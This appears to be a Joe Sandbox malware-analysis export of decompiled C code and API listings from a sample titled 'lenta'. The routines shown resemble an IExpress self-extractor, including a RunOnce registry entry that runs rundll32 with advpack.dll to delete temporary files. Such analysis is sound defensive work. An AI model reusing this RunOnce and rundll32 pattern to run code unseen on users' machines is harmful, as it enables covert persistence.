                            0x00943507
                            0x0094350c
                            0x0094365b
                            0x0094365f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00943661
                            0x00943512
                            0x00943515
                            0x009435be
                            0x009435c1
                            0x009435d1
                            0x009435d8
                            0x009435de
                            0x009435f8
                            0x00943617
                            0x00943617
                            0x00943623
                            0x00943637
                            0x0094363d
                            0x00943642
                            0x00943644
                            0x00000000
                            0x00943646
                            0x00943652
                            0x00943657
                            0x00943658
                            0x00000000
                            0x00943658
                            0x00943644
                            0x0094351b
                            0x0094351d
                            0x0094354f
                            0x00943553
                            0x00000000
                            0x00000000
                            0x0094355f
                            0x00943565
                            0x0094357c
                            0x00943581
                            0x00943584
                            0x0094359b
                            0x009435a1
                            0x009435a7
                            0x009435ad
                            0x009435b3
                            0x009435b8
                            0x00000000
                            0x009435b8
                            0x00943586
                            0x00943588
                            0x00000000
                            0x00000000
                            0x00943590
                            0x00000000
                            0x00943590
                            0x00943524
                            0x00943535
                            0x00943541
                            0x00000000
                            0x00943549
                            0x00000000

                            APIs
                            • TerminateThread.KERNEL32(00000000), ref: 00943535
                            • EndDialog.USER32(?,?), ref: 00943541
                            • ResetEvent.KERNEL32 ref: 0094355F
                            • SetEvent.KERNEL32(00941140,00000000,00000020,00000004), ref: 00943590
                            • GetDesktopWindow.USER32 ref: 009435C7
                            • GetDlgItem.USER32(?,0000083B), ref: 009435F1
                            • SendMessageA.USER32(00000000), ref: 009435F8
                            • GetDlgItem.USER32(?,0000083B), ref: 00943610
                            • SendMessageA.USER32(00000000), ref: 00943617
                            • SetWindowTextA.USER32(?,lenta), ref: 00943623
                            • CreateThread.KERNEL32 ref: 00943637
                            • EndDialog.USER32(?,00000000), ref: 00943671
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                            • String ID: lenta
                            • API String ID: 2406144884-2780258678
                            • Opcode ID: b4475425470b3ae783f61585fe10aa4dc3c285185de5b937a3744a463c8b9a28
                            • Instruction ID: 34d28181ed5b6caff3d24b6d431ef7e15abc6f0afc8d794484cf706c1918cdf4
                            • Opcode Fuzzy Hash: b4475425470b3ae783f61585fe10aa4dc3c285185de5b937a3744a463c8b9a28
                            • Instruction Fuzzy Hash: 4631C77926C301BBE7201F35EC4EF2B3A68E7CBB05F108915F616952A1CB758901EB55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E00944224(char __ecx) {
                            				char* _v8;
                            				_Unknown_base(*)()* _v12;
                            				_Unknown_base(*)()* _v16;
                            				_Unknown_base(*)()* _v20;
                            				char* _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				_Unknown_base(*)()* _t26;
                            				_Unknown_base(*)()* _t28;
                            				_Unknown_base(*)()* _t29;
                            				_Unknown_base(*)()* _t32;
                            				char _t42;
                            				char* _t44;
                            				char* _t61;
                            				void* _t63;
                            				char* _t65;
                            				struct HINSTANCE__* _t66;
                            				char _t67;
                            				void* _t71;
                            				char _t76;
                            				intOrPtr _t85;
                            
                            				_t67 = __ecx;
                            				_t66 = LoadLibraryA("SHELL32.DLL");
                            				if(_t66 == 0) {
                            					_t63 = 0x4c2;
                            					L22:
                            					E009444B9(_t67, _t63, 0, 0, 0x10, 0);
                            					return 0;
                            				}
                            				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                            				_v12 = _t26;
                            				if(_t26 == 0) {
                            					L20:
                            					FreeLibrary(_t66);
                            					_t63 = 0x4c1;
                            					goto L22;
                            				}
                            				_t28 = GetProcAddress(_t66, 0xc3);
                            				_v20 = _t28;
                            				if(_t28 == 0) {
                            					goto L20;
                            				}
                            				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                            				_v16 = _t29;
                            				if(_t29 == 0) {
                            					goto L20;
                            				}
                            				_t76 =  *0x9488c0; // 0x0
                            				if(_t76 != 0) {
                            					L10:
                            					 *0x9487a0 = 0;
                            					_v52 = _t67;
                            					_v48 = 0;
                            					_v44 = 0;
                            					_v40 = 0x948598;
                            					_v36 = 1;
                            					_v32 = E00944200;
                            					_v28 = 0x9488c0;
                            					 *0x94a288( &_v52);
                            					_t32 =  *_v12();
                            					if(_t71 != _t71) {
                            						asm("int 0x29");
                            					}
                            					_v12 = _t32;
                            					if(_t32 != 0) {
                            						 *0x94a288(_t32, 0x9488c0);
                            						 *_v16();
                            						if(_t71 != _t71) {
                            							asm("int 0x29");
                            						}
                            						if( *0x9488c0 != 0) {
                            							E00941680(0x9487a0, 0x104, 0x9488c0);
                            						}
                            						 *0x94a288(_v12);
                            						 *_v20();
                            						if(_t71 != _t71) {
                            							asm("int 0x29");
                            						}
                            					}
                            					FreeLibrary(_t66);
                            					_t85 =  *0x9487a0; // 0x0
                            					return 0 | _t85 != 0x00000000;
                            				} else {
                            					GetTempPathA(0x104, 0x9488c0);
                            					_t61 = 0x9488c0;
                            					_t4 =  &(_t61[1]); // 0x9488c1
                            					_t65 = _t4;
                            					do {
                            						_t42 =  *_t61;
                            						_t61 =  &(_t61[1]);
                            					} while (_t42 != 0);
                            					_t5 = _t61 - _t65 + 0x9488c0; // 0x1291181
                            					_t44 = CharPrevA(0x9488c0, _t5);
                            					_v8 = _t44;
                            					if( *_t44 == 0x5c &&  *(CharPrevA(0x9488c0, _t44)) != 0x3a) {
                            						 *_v8 = 0;
                            					}
                            					goto L10;
                            				}
                            			}




























                            0x00944234
                            0x0094423c
                            0x00944240
                            0x009443b2
                            0x009443b7
                            0x009443c0
                            0x00000000
                            0x009443c5
                            0x0094424c
                            0x00944252
                            0x00944257
                            0x009443a4
                            0x009443a5
                            0x009443ab
                            0x00000000
                            0x009443ab
                            0x00944263
                            0x00944269
                            0x0094426e
                            0x00000000
                            0x00000000
                            0x0094427a
                            0x00944280
                            0x00944285
                            0x00000000
                            0x00000000
                            0x0094428d
                            0x00944293
                            0x009442e6
                            0x009442e9
                            0x009442ef
                            0x009442f4
                            0x009442f7
                            0x00944300
                            0x00944307
                            0x0094430e
                            0x00944315
                            0x0094431c
                            0x00944322
                            0x00944326
                            0x0094432d
                            0x0094432d
                            0x0094432f
                            0x00944334
                            0x00944343
                            0x00944349
                            0x0094434d
                            0x00944354
                            0x00944354
                            0x0094435d
                            0x0094436e
                            0x0094436e
                            0x0094437d
                            0x00944383
                            0x00944387
                            0x0094438e
                            0x0094438e
                            0x00944387
                            0x00944391
                            0x00944399
                            0x00000000
                            0x00944295
                            0x0094429f
                            0x009442a5
                            0x009442aa
                            0x009442aa
                            0x009442ad
                            0x009442ad
                            0x009442af
                            0x009442b0
                            0x009442b6
                            0x009442c2
                            0x009442c8
                            0x009442ce
                            0x009442e4
                            0x009442e4
                            0x00000000
                            0x009442ce

                            APIs
                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00944236
                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0094424C
                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00944263
                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0094427A
                            • GetTempPathA.KERNEL32(00000104,009488C0,?,00000001), ref: 0094429F
                            • CharPrevA.USER32(009488C0,01291181,?,00000001), ref: 009442C2
                            • CharPrevA.USER32(009488C0,00000000,?,00000001), ref: 009442D6
                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00944391
                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 009443A5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                            • API String ID: 1865808269-1731843650
                            • Opcode ID: bdd291ab2b8116d88ce1eaea786873e234ace40d04777e834efb930b30ff21f0
                            • Instruction ID: d02f4cccceedc0619dcd903a33712728f1f534fb90b65b973e951b9c1d414614
                            • Opcode Fuzzy Hash: bdd291ab2b8116d88ce1eaea786873e234ace40d04777e834efb930b30ff21f0
                            • Instruction Fuzzy Hash: 00412678A48304AFD711AF70DC98F6F7BB8EB8A748F140269E951A3351CB758D01D761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E009444B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                            				signed int _v8;
                            				char _v64;
                            				char _v576;
                            				void* _v580;
                            				struct HWND__* _v584;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t34;
                            				void* _t37;
                            				signed int _t39;
                            				intOrPtr _t43;
                            				signed int _t44;
                            				signed int _t49;
                            				signed int _t52;
                            				void* _t54;
                            				intOrPtr _t55;
                            				intOrPtr _t58;
                            				intOrPtr _t59;
                            				int _t64;
                            				void* _t66;
                            				intOrPtr* _t67;
                            				signed int _t69;
                            				intOrPtr* _t73;
                            				intOrPtr* _t76;
                            				intOrPtr* _t77;
                            				void* _t80;
                            				void* _t81;
                            				void* _t82;
                            				intOrPtr* _t84;
                            				void* _t85;
                            				signed int _t89;
                            
                            				_t75 = __edx;
                            				_t34 =  *0x948004; // 0xec518a5e
                            				_v8 = _t34 ^ _t89;
                            				_v584 = __ecx;
                            				_t83 = "LoadString() Error.  Could not load string resource.";
                            				_t67 = _a4;
                            				_t69 = 0xd;
                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                            				_t80 = _t83 + _t69 + _t69;
                            				_v580 = _t37;
                            				asm("movsb");
                            				if(( *0x948a38 & 0x00000001) != 0) {
                            					_t39 = 1;
                            				} else {
                            					_v576 = 0;
                            					LoadStringA( *0x949a3c, _t75,  &_v576, 0x200);
                            					if(_v576 != 0) {
                            						_t73 =  &_v576;
                            						_t16 = _t73 + 1; // 0x1
                            						_t75 = _t16;
                            						do {
                            							_t43 =  *_t73;
                            							_t73 = _t73 + 1;
                            						} while (_t43 != 0);
                            						_t84 = _v580;
                            						_t74 = _t73 - _t75;
                            						if(_t84 == 0) {
                            							if(_t67 == 0) {
                            								_t27 = _t74 + 1; // 0x2
                            								_t83 = _t27;
                            								_t44 = LocalAlloc(0x40, _t83);
                            								_t80 = _t44;
                            								if(_t80 == 0) {
                            									goto L6;
                            								} else {
                            									_t75 = _t83;
                            									_t74 = _t80;
                            									E00941680(_t80, _t83,  &_v576);
                            									goto L23;
                            								}
                            							} else {
                            								_t76 = _t67;
                            								_t24 = _t76 + 1; // 0x1
                            								_t85 = _t24;
                            								do {
                            									_t55 =  *_t76;
                            									_t76 = _t76 + 1;
                            								} while (_t55 != 0);
                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                            								_t83 = _t25 + _t74;
                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                            								_t80 = _t44;
                            								if(_t80 == 0) {
                            									goto L6;
                            								} else {
                            									E0094171E(_t80, _t83,  &_v576, _t67);
                            									goto L23;
                            								}
                            							}
                            						} else {
                            							_t77 = _t67;
                            							_t18 = _t77 + 1; // 0x1
                            							_t81 = _t18;
                            							do {
                            								_t58 =  *_t77;
                            								_t77 = _t77 + 1;
                            							} while (_t58 != 0);
                            							_t75 = _t77 - _t81;
                            							_t82 = _t84 + 1;
                            							do {
                            								_t59 =  *_t84;
                            								_t84 = _t84 + 1;
                            							} while (_t59 != 0);
                            							_t21 = _t74 + 0x64; // 0x65
                            							_t83 = _t21 + _t84 - _t82 + _t75;
                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                            							_t80 = _t44;
                            							if(_t80 == 0) {
                            								goto L6;
                            							} else {
                            								_push(_v580);
                            								E0094171E(_t80, _t83,  &_v576, _t67);
                            								L23:
                            								MessageBeep(_a12);
                            								if(E0094681F(_t67) == 0) {
                            									L25:
                            									_t49 = 0x10000;
                            								} else {
                            									_t54 = E009467C9(_t74, _t74);
                            									_t49 = 0x190000;
                            									if(_t54 == 0) {
                            										goto L25;
                            									}
                            								}
                            								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                            								_t83 = _t52;
                            								LocalFree(_t80);
                            								_t39 = _t52;
                            							}
                            						}
                            					} else {
                            						if(E0094681F(_t67) == 0) {
                            							L4:
                            							_t64 = 0x10010;
                            						} else {
                            							_t66 = E009467C9(0, 0);
                            							_t64 = 0x190010;
                            							if(_t66 == 0) {
                            								goto L4;
                            							}
                            						}
                            						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                            						L6:
                            						_t39 = _t44 | 0xffffffff;
                            					}
                            				}
                            				return E00946CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                            			}



































                            0x009444b9
                            0x009444c4
                            0x009444cb
                            0x009444d8
                            0x009444e4
                            0x009444eb
                            0x009444ee
                            0x009444ef
                            0x009444ef
                            0x009444f1
                            0x009444f7
                            0x009444f8
                            0x0094467b
                            0x009444fe
                            0x00944509
                            0x00944518
                            0x00944525
                            0x00944562
                            0x00944568
                            0x00944568
                            0x0094456b
                            0x0094456b
                            0x0094456d
                            0x0094456e
                            0x00944572
                            0x00944578
                            0x0094457c
                            0x009445cb
                            0x00944607
                            0x00944607
                            0x0094460d
                            0x00944613
                            0x00944617
                            0x00000000
                            0x0094461d
                            0x00944623
                            0x00944626
                            0x00944628
                            0x00000000
                            0x00944628
                            0x009445cd
                            0x009445cd
                            0x009445cf
                            0x009445cf
                            0x009445d2
                            0x009445d2
                            0x009445d4
                            0x009445d5
                            0x009445db
                            0x009445de
                            0x009445e3
                            0x009445e9
                            0x009445ed
                            0x00000000
                            0x009445f3
                            0x009445fd
                            0x00000000
                            0x00944602
                            0x009445ed
                            0x0094457e
                            0x0094457e
                            0x00944580
                            0x00944580
                            0x00944583
                            0x00944583
                            0x00944585
                            0x00944586
                            0x0094458a
                            0x0094458c
                            0x0094458f
                            0x0094458f
                            0x00944591
                            0x00944592
                            0x0094459b
                            0x0094459e
                            0x009445a3
                            0x009445a9
                            0x009445ad
                            0x00000000
                            0x009445af
                            0x009445af
                            0x009445bf
                            0x0094462d
                            0x00944630
                            0x0094463d
                            0x0094464e
                            0x0094464e
                            0x0094463f
                            0x00944640
                            0x00944647
                            0x0094464c
                            0x00000000
                            0x00000000
                            0x0094464c
                            0x00944666
                            0x0094466d
                            0x0094466f
                            0x00944675
                            0x00944675
                            0x009445ad
                            0x00944527
                            0x0094452e
                            0x0094453f
                            0x0094453f
                            0x00944530
                            0x00944531
                            0x00944538
                            0x0094453d
                            0x00000000
                            0x00000000
                            0x0094453d
                            0x00944554
                            0x0094455a
                            0x0094455a
                            0x0094455a
                            0x00944525
                            0x0094468c

                            APIs
                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
                            • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554
                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 009445A3
                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 009445E3
                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 0094460D
                            • MessageBeep.USER32(00000000), ref: 00944630
                            • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00944666
                            • LocalFree.KERNEL32(00000000), ref: 0094466F
                              • Part of subcall function 0094681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0094686E
                              • Part of subcall function 0094681F: GetSystemMetrics.USER32(0000004A), ref: 009468A7
                              • Part of subcall function 0094681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009468CC
                              • Part of subcall function 0094681F: RegQueryValueExA.ADVAPI32(?,00941140,00000000,?,?,0000000C), ref: 009468F4
                              • Part of subcall function 0094681F: RegCloseKey.ADVAPI32(?), ref: 00946902
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                            • String ID: LoadString() Error. Could not load string resource.$lenta
                            • API String ID: 3244514340-1000497449
                            • Opcode ID: 57a5255ebb348139ef738d4983d0004e50fa3e81be93b9e53a91b3e88f4da455
                            • Instruction ID: 87e7228e07a3243943b67b59f2cc174e83faaa18c4f8ca6daa341dbd5ca973f2
                            • Opcode Fuzzy Hash: 57a5255ebb348139ef738d4983d0004e50fa3e81be93b9e53a91b3e88f4da455
                            • Instruction Fuzzy Hash: B3511176904219AFDF219F28DC48FAABBB8EF86304F014194FD09A7241DB31DE45DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E00942773(CHAR* __ecx, char* _a4) {
                            				signed int _v8;
                            				char _v268;
                            				char _v269;
                            				CHAR* _v276;
                            				int _v280;
                            				void* _v284;
                            				int _v288;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t23;
                            				intOrPtr _t34;
                            				int _t45;
                            				int* _t50;
                            				CHAR* _t52;
                            				CHAR* _t61;
                            				char* _t62;
                            				int _t63;
                            				CHAR* _t64;
                            				signed int _t65;
                            
                            				_t52 = __ecx;
                            				_t23 =  *0x948004; // 0xec518a5e
                            				_v8 = _t23 ^ _t65;
                            				_t62 = _a4;
                            				_t50 = 0;
                            				_t61 = __ecx;
                            				_v276 = _t62;
                            				 *((char*)(__ecx)) = 0;
                            				if( *_t62 != 0x23) {
                            					_t63 = 0x104;
                            					goto L14;
                            				} else {
                            					_t64 = _t62 + 1;
                            					_v269 = CharUpperA( *_t64);
                            					_v276 = CharNextA(CharNextA(_t64));
                            					_t63 = 0x104;
                            					_t34 = _v269;
                            					if(_t34 == 0x53) {
                            						L14:
                            						GetSystemDirectoryA(_t61, _t63);
                            						goto L15;
                            					} else {
                            						if(_t34 == 0x57) {
                            							GetWindowsDirectoryA(_t61, 0x104);
                            							goto L16;
                            						} else {
                            							_push(_t52);
                            							_v288 = 0x104;
                            							E00941781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                            							_t59 = 0x104;
                            							E0094658A( &_v268, 0x104, _v276);
                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                            								L16:
                            								_t59 = _t63;
                            								E0094658A(_t61, _t63, _v276);
                            							} else {
                            								if(RegQueryValueExA(_v284, 0x941140, 0,  &_v280, _t61,  &_v288) == 0) {
                            									_t45 = _v280;
                            									if(_t45 != 2) {
                            										L9:
                            										if(_t45 == 1) {
                            											goto L10;
                            										}
                            									} else {
                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                            											_t45 = _v280;
                            											goto L9;
                            										} else {
                            											_t59 = 0x104;
                            											E00941680(_t61, 0x104,  &_v268);
                            											L10:
                            											_t50 = 1;
                            										}
                            									}
                            								}
                            								RegCloseKey(_v284);
                            								L15:
                            								if(_t50 == 0) {
                            									goto L16;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return E00946CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                            			}























                            0x00942773
                            0x0094277e
                            0x00942785
                            0x0094278a
                            0x0094278d
                            0x00942790
                            0x00942792
                            0x00942798
                            0x0094279d
                            0x009428b2
                            0x00000000
                            0x009427a3
                            0x009427a3
                            0x009427af
                            0x009427c2
                            0x009427c8
                            0x009427cd
                            0x009427d5
                            0x009428b7
                            0x009428b9
                            0x00000000
                            0x009427db
                            0x009427dd
                            0x009428aa
                            0x00000000
                            0x009427e3
                            0x009427e3
                            0x009427ec
                            0x009427f8
                            0x00942803
                            0x0094280b
                            0x00942831
                            0x009428c3
                            0x009428c9
                            0x009428cd
                            0x00942837
                            0x0094285a
                            0x0094285c
                            0x00942865
                            0x00942892
                            0x00942895
                            0x00000000
                            0x00000000
                            0x00942867
                            0x00942878
                            0x0094288c
                            0x00000000
                            0x0094287a
                            0x00942880
                            0x00942885
                            0x00942897
                            0x00942899
                            0x00942899
                            0x00942878
                            0x00942865
                            0x009428a0
                            0x009428bf
                            0x009428c1
                            0x00000000
                            0x00000000
                            0x009428c1
                            0x00942831
                            0x009427dd
                            0x009427d5
                            0x009428e5

                            APIs
                            • CharUpperA.USER32(EC518A5E,00000000,00000000,00000000), ref: 009427A8
                            • CharNextA.USER32(0000054D), ref: 009427B5
                            • CharNextA.USER32(00000000), ref: 009427BC
                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00942829
                            • RegQueryValueExA.ADVAPI32(?,00941140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00942852
                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00942870
                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009428A0
                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 009428AA
                            • GetSystemDirectoryA.KERNEL32 ref: 009428B9
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 009427E4
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                            • API String ID: 2659952014-2428544900
                            • Opcode ID: 102c552b11804ab31b0f88c967a60553b1bdbc9e13213c1613e3e4c907769d48
                            • Instruction ID: d8be80ed2a85f73cf7c4a1efdcf190088ed1658c0632463fb8b3bead93e37b99
                            • Opcode Fuzzy Hash: 102c552b11804ab31b0f88c967a60553b1bdbc9e13213c1613e3e4c907769d48
                            • Instruction Fuzzy Hash: 8841C375A1812CAFDB249B649C85EEE7BBCEF56700F4000A9F645D2200DB708E859FA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E00942267() {
                            				signed int _v8;
                            				char _v268;
                            				char _v836;
                            				void* _v840;
                            				int _v844;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t19;
                            				intOrPtr _t33;
                            				void* _t38;
                            				intOrPtr* _t42;
                            				void* _t45;
                            				void* _t47;
                            				void* _t49;
                            				signed int _t51;
                            
                            				_t19 =  *0x948004; // 0xec518a5e
                            				_t20 = _t19 ^ _t51;
                            				_v8 = _t19 ^ _t51;
                            				if( *0x948530 != 0) {
                            					_push(_t49);
                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                            						_push(_t38);
                            						_v844 = 0x238;
                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                            							_push(_t47);
                            							memset( &_v268, 0, 0x104);
                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                            								E0094658A( &_v268, 0x104, 0x941140);
                            							}
                            							_push("C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
                            							E0094171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                            							_t42 =  &_v836;
                            							_t45 = _t42 + 1;
                            							_pop(_t47);
                            							do {
                            								_t33 =  *_t42;
                            								_t42 = _t42 + 1;
                            							} while (_t33 != 0);
                            							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                            						}
                            						_t20 = RegCloseKey(_v840);
                            						_pop(_t38);
                            					}
                            					_pop(_t49);
                            				}
                            				return E00946CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                            			}



















                            0x00942272
                            0x00942277
                            0x00942279
                            0x00942283
                            0x00942289
                            0x009422ab
                            0x009422b1
                            0x009422c4
                            0x009422e0
                            0x009422e6
                            0x009422f5
                            0x0094230d
                            0x0094231c
                            0x0094231c
                            0x00942321
                            0x0094233a
                            0x00942342
                            0x00942348
                            0x0094234b
                            0x0094234c
                            0x0094234c
                            0x0094234e
                            0x0094234f
                            0x0094236e
                            0x0094236e
                            0x0094237a
                            0x00942380
                            0x00942380
                            0x00942381
                            0x00942381
                            0x0094238f

                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 009422A3
                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 009422D8
                            • memset.MSVCRT ref: 009422F5
                            • GetSystemDirectoryA.KERNEL32 ref: 00942305
                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0094236E
                            • RegCloseKey.ADVAPI32(?), ref: 0094237A
                            Strings
                            • wextract_cleanup1, xrefs: 0094227C, 009422CD, 00942363
                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00942321
                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0094232D
                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00942299
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                            • API String ID: 3027380567-2836157002
                            • Opcode ID: 703ef017b4b1dd2931d9c679aef8798ab026a26072ff86b8c1de5df2c3f490c5
                            • Instruction ID: b742ee6971ae46714a63da2da6b74453620bc0bd6fe030d1037dfeca335d2e2b
                            • Opcode Fuzzy Hash: 703ef017b4b1dd2931d9c679aef8798ab026a26072ff86b8c1de5df2c3f490c5
                            • Instruction Fuzzy Hash: CD31B175A04218ABDB219B60DC49FEBBB7CEF96704F0001E9F54DA6051EA71AF88CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E00943100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                            				void* _t8;
                            				void* _t11;
                            				void* _t15;
                            				struct HWND__* _t16;
                            				struct HWND__* _t33;
                            				struct HWND__* _t34;
                            
                            				_t8 = _a8 - 0xf;
                            				if(_t8 == 0) {
                            					if( *0x948590 == 0) {
                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                            						 *0x948590 = 1;
                            					}
                            					L13:
                            					return 0;
                            				}
                            				_t11 = _t8 - 1;
                            				if(_t11 == 0) {
                            					L7:
                            					_push(0);
